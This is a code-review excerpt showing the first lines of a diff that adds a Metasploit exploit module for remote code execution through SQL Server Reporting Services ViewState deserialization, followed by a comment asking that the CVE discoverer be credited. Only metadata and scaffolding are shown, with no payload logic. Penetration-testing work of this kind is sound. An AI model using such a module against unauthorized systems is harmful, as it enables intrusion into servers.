modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb

```diff
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'SQL Server Reporting Services (SSRS) Viewstate Deserialization',
+      'Description' => %q{
+        A vulnerability exists within Microsoft's SQL Server Reporting Services
+        which can allow an attacker to craft an HTTP POST request with a
+        serialized object to achieve remote code execution. The vulnerability is
+        due to the fact that the serialized blob is not signed by the server.
+      },
+      'Author' => 'Spencer McIntyre',
```

Comment:
Please credit [Soroush Dalili](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618) for the discovery and PoC. :)